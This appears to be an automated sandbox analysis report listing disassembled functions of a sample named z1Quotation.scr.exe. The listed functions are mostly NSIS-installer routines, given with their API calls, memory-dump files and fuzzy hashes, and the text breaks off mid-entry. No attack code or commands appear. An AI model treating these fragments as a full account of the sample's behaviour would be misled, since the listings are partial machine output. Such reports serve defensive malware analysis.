                                                                                                                  • SetTimer.USER32(?,?,000000FA,00000000), ref: 00402E45
                                                                                                                  • wsprintfA.USER32 ref: 00402E79
                                                                                                                  • SetWindowTextA.USER32(?,?), ref: 00402E89
                                                                                                                  • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402E9B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                  • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                                  • API String ID: 1451636040-1158693248
                                                                                                                  • Opcode ID: 71edbbfcd38a5cf25fa41dd78e6502004d6f2f503a5ec3f242630c3e9865e773
                                                                                                                  • Instruction ID: f7a7a6216a7823a48eec7a1ba1cbc9c7d61ea1926bc167b563143084b02fa0b6
                                                                                                                  • Opcode Fuzzy Hash: 71edbbfcd38a5cf25fa41dd78e6502004d6f2f503a5ec3f242630c3e9865e773
                                                                                                                  • Instruction Fuzzy Hash: B7F0197154020DFAEF209F50DD0AFAE3769EB14348F00813AFA16B51E0DBB999558F99
                                                                                                                  Function 6D432381 Relevance: 9.1, APIs: 6, Instructions: 140memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6D4324D7
                                                                                                                    • Part of subcall function 6D4312B4: lstrcpynA.KERNEL32(00000000,?,6D43135F,-6D43504B,6D4311C0,-000000A0), ref: 6D4312C4
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6D432452
                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 6D432467
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,00000010), ref: 6D432478
                                                                                                                  • CLSIDFromString.OLE32(00000000,00000000), ref: 6D432486
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6D43248D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33522427581.000000006D431000.00000020.00000001.01000000.00000004.sdmp, Offset: 6D430000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33522346025.000000006D430000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33522508051.000000006D434000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33522587751.000000006D436000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_6d430000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3730416702-0
                                                                                                                  • Opcode ID: eddc92da1b66376fc2881c30ee0434da7a7c7c988f203c617a6ef10952e7de1f
                                                                                                                  • Instruction ID: 6ab17c39f5dc7e1280e9c583ba8951b9e95b40b7e6f066e99bbe57e9d3d5efc0
                                                                                                                  • Opcode Fuzzy Hash: eddc92da1b66376fc2881c30ee0434da7a7c7c988f203c617a6ef10952e7de1f
                                                                                                                  • Instruction Fuzzy Hash: C741ABB1508321EFD724AF2E9880F6A73B8FB4A315F12891EE545DA681DB70DC45CBE1
                                                                                                                  Function 004027ED Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 0040284E
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 0040286A
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 004028A9
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 004028BC
                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028D8
                                                                                                                  • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004028EB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2667972263-0
                                                                                                                  • Opcode ID: 5289f6181331c075ce81e05830bde21c2289f169078f71b7f89bc81ef9f9314b
                                                                                                                  • Instruction ID: 2e119b835233d6f5aedc0dc774553b8e46677ed278b00a4e66694fbf831c99a8
                                                                                                                  • Opcode Fuzzy Hash: 5289f6181331c075ce81e05830bde21c2289f169078f71b7f89bc81ef9f9314b
                                                                                                                  • Instruction Fuzzy Hash: 7B318C32C00128BBDF216FA5CE49D9E7A79EF44364F10823AF564762E1CB7949419FA8
                                                                                                                  Function 00404C87 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • lstrlenA.KERNEL32(Inaugurates Setup: Installing,Inaugurates Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404BA2,000000DF,00000000,00000400,?), ref: 00404D25
                                                                                                                  • wsprintfA.USER32 ref: 00404D2D
                                                                                                                  • SetDlgItemTextA.USER32(?,Inaugurates Setup: Installing), ref: 00404D40
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ItemTextlstrlenwsprintf
                                                                                                                  • String ID: %u.%u%s%s$Inaugurates Setup: Installing
                                                                                                                  • API String ID: 3540041739-3717247011
                                                                                                                  • Opcode ID: d337dd74189e72dcb0c2b62014cc3533d70f46b2d75e50d72d1433aa9521b4fc
                                                                                                                  • Instruction ID: d1054571f22236f5070a6bac95ee8f8f6ff6b53a3a914de6167745cc8bc9eb80
                                                                                                                  • Opcode Fuzzy Hash: d337dd74189e72dcb0c2b62014cc3533d70f46b2d75e50d72d1433aa9521b4fc
                                                                                                                  • Instruction Fuzzy Hash: A811B773A0413437EB00666D9C45EAF36989B85374F264237FA26F31D1E978CC6241E8
                                                                                                                  Function 00402D40 Relevance: 7.6, APIs: 5, Instructions: 84registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402D94
                                                                                                                  • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402DE0
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DE9
                                                                                                                  • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402E00
                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?), ref: 00402E0B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseEnum$DeleteValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1354259210-0
                                                                                                                  • Opcode ID: 801702f539c1c9c5f4565a27d955d4b94d520761f7c046de30508d717588a551
                                                                                                                  • Instruction ID: 19de43e7d85ef81c6dfe7f4a1c21cfd10e6bc7dabfae197940a81e7d35f032fc
                                                                                                                  • Opcode Fuzzy Hash: 801702f539c1c9c5f4565a27d955d4b94d520761f7c046de30508d717588a551
                                                                                                                  • Instruction Fuzzy Hash: 5E215C72900108BBDF129F90CE89EEF7B6DEF44354F1000B6FA55B11A0D7B49E549AA4
                                                                                                                  Function 00401D6A Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetDlgItem.USER32(?,?), ref: 00401D83
                                                                                                                  • GetClientRect.USER32(?,?), ref: 00401DD1
                                                                                                                  • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401E01
                                                                                                                  • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401E15
                                                                                                                  • DeleteObject.GDI32(00000000), ref: 00401E25
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1849352358-0
                                                                                                                  • Opcode ID: 0fd5428a97cd1cc8f0ee98fc51432bb7b6a6103cd8c6a6c427f120dbdef3efce
                                                                                                                  • Instruction ID: c471a49968a387dcca5c9e002c22cbfba05dcd98b2a540349ef2bfa8a6736ab3
                                                                                                                  • Opcode Fuzzy Hash: 0fd5428a97cd1cc8f0ee98fc51432bb7b6a6103cd8c6a6c427f120dbdef3efce
                                                                                                                  • Instruction Fuzzy Hash: DE212A72A00509ABCF15DF94DD45AAEBBB5FB88300F24407AF901F62A1CB389941DB58
                                                                                                                  Function 00401C33 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CA3
                                                                                                                  • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401CBB
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: MessageSend$Timeout
                                                                                                                  • String ID: !
                                                                                                                  • API String ID: 1777923405-2657877971
                                                                                                                  • Opcode ID: 514fa83efa97b27bb6f1fb33466f6366df9daaef786b8ebc71e6634d94cbabbc
                                                                                                                  • Instruction ID: e0ea5619f3fca7b3848dd4e51b4747dbb243fd68396e170749e032bc92ec94b5
                                                                                                                  • Opcode Fuzzy Hash: 514fa83efa97b27bb6f1fb33466f6366df9daaef786b8ebc71e6634d94cbabbc
                                                                                                                  • Instruction Fuzzy Hash: BA219471948208BEEF05DFA4DA86AAE7FB1EF84304F14447EF501F61D1C6788681DB18
                                                                                                                  Function 00405D30 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004034BE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 00405D36
                                                                                                                  • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004034BE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037AE,?,00000008,0000000A,0000000C), ref: 00405D3F
                                                                                                                  • lstrcatA.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405D50
                                                                                                                  Strings
                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00405D30
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CharPrevlstrcatlstrlen
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                  • API String ID: 2659869361-3355392842
                                                                                                                  • Opcode ID: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                                                                                                  • Instruction ID: bef2bae019a3afb3ced271248f580763d201261a4de752ea149ff92e4d19d118
                                                                                                                  • Opcode Fuzzy Hash: 1585f28ce29590c56c09183d2983d03a0d8d28acc38857c1cbd7e9952efaabbf
                                                                                                                  • Instruction Fuzzy Hash: CAD0A9A2205A302AD20237259C09ECF2A4CCF02305B06406BF740B22A2C73C0C2287FE
                                                                                                                  Function 00403AB5 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CloseHandle.KERNEL32(000002E8,C:\Users\user\AppData\Local\Temp\,004038B8,?,?,00000008,0000000A,0000000C), ref: 00403AC7
                                                                                                                  • CloseHandle.KERNEL32(000002F0,C:\Users\user\AppData\Local\Temp\,004038B8,?,?,00000008,0000000A,0000000C), ref: 00403ADB
                                                                                                                  Strings
                                                                                                                  • C:\Users\user\AppData\Local\Temp\, xrefs: 00403ABA
                                                                                                                  • C:\Users\user\AppData\Local\Temp\nsi8284.tmp, xrefs: 00403AEB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseHandle
                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsi8284.tmp
                                                                                                                  • API String ID: 2962429428-1691738005
                                                                                                                  • Opcode ID: aeb99d232cf47e8a20d3d5ec1d32ffc6ab59edb41f783ba39e9555f72a53b2ca
                                                                                                                  • Instruction ID: ff9ebad1180b2e4106c3fd78ccd96f1c4a15e6799f7945cef2c479d43df33b37
                                                                                                                  • Opcode Fuzzy Hash: aeb99d232cf47e8a20d3d5ec1d32ffc6ab59edb41f783ba39e9555f72a53b2ca
                                                                                                                  • Instruction Fuzzy Hash: 30E08630A0071896C520AF7DAD4D9853B1C9B413357648726F078F24F1C738AD9A5EAD
                                                                                                                  Function 00405456 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • IsWindowVisible.USER32(?), ref: 00405485
                                                                                                                  • CallWindowProcA.USER32(?,?,?,?), ref: 004054D6
                                                                                                                    • Part of subcall function 0040448A: SendMessageA.USER32(0001042E,00000000,00000000,00000000), ref: 0040449C
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Window$CallMessageProcSendVisible
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3748168415-3916222277
                                                                                                                  • Opcode ID: 412f85055a7b4b60e29cefcffd65736eb893493a2d5b05970a417412d487e36e
                                                                                                                  • Instruction ID: 3ca985e8459022ba4c2860a47f04ce2402bd6999f3b8cd334613330205fca9f6
                                                                                                                  • Opcode Fuzzy Hash: 412f85055a7b4b60e29cefcffd65736eb893493a2d5b05970a417412d487e36e
                                                                                                                  • Instruction Fuzzy Hash: B2014C71100609AFEB605F12DD84BDB3A65EB84322F504136FA05761E1D6799CD29F29
                                                                                                                  Function 00405D77 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402FCD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z1Quotation.scr.exe,C:\Users\user\Desktop\z1Quotation.scr.exe,80000000,00000003), ref: 00405D7D
                                                                                                                  • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402FCD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\z1Quotation.scr.exe,C:\Users\user\Desktop\z1Quotation.scr.exe,80000000,00000003), ref: 00405D8B
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33493191330.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33493137695.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493246099.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493288992.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33493506328.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_400000_z1Quotation.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CharPrevlstrlen
                                                                                                                  • String ID: C:\Users\user\Desktop
                                                                                                                  • API String ID: 2709904686-3370423016
                                                                                                                  • Opcode ID: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                                                                                                  • Instruction ID: de7bafd9365d3e4204aaa76ad73f554e4e8073dc9f8dca5daac844f9e70ad8c0
                                                                                                                  • Opcode Fuzzy Hash: 636972430895b8d26769eef308ecf034eeaaaa2c94ab7ae9d1342fa23427dc1b
                                                                                                                  • Instruction Fuzzy Hash: F6D0A7B2408E701EE30363109C08B9F6A88CF12300F0940A7E680A6195C2780C4147ED
                                                                                                                  Function 6D4310E0 Relevance: 5.1, APIs: 4, Instructions: 144memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6D43116B
                                                                                                                  • GlobalAlloc.KERNEL32(00000040,?), ref: 6D4311D8
                                                                                                                  • GlobalFree.KERNEL32(?), ref: 6D431286
                                                                                                                  • GlobalFree.KERNEL32(00000000), ref: 6D43129B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.33522427581.000000006D431000.00000020.00000001.01000000.00000004.sdmp, Offset: 6D430000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.33522346025.000000006D430000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.33522508051.000000006D434000.00000002.00000001.01000000.00000004.sdmpDownload File
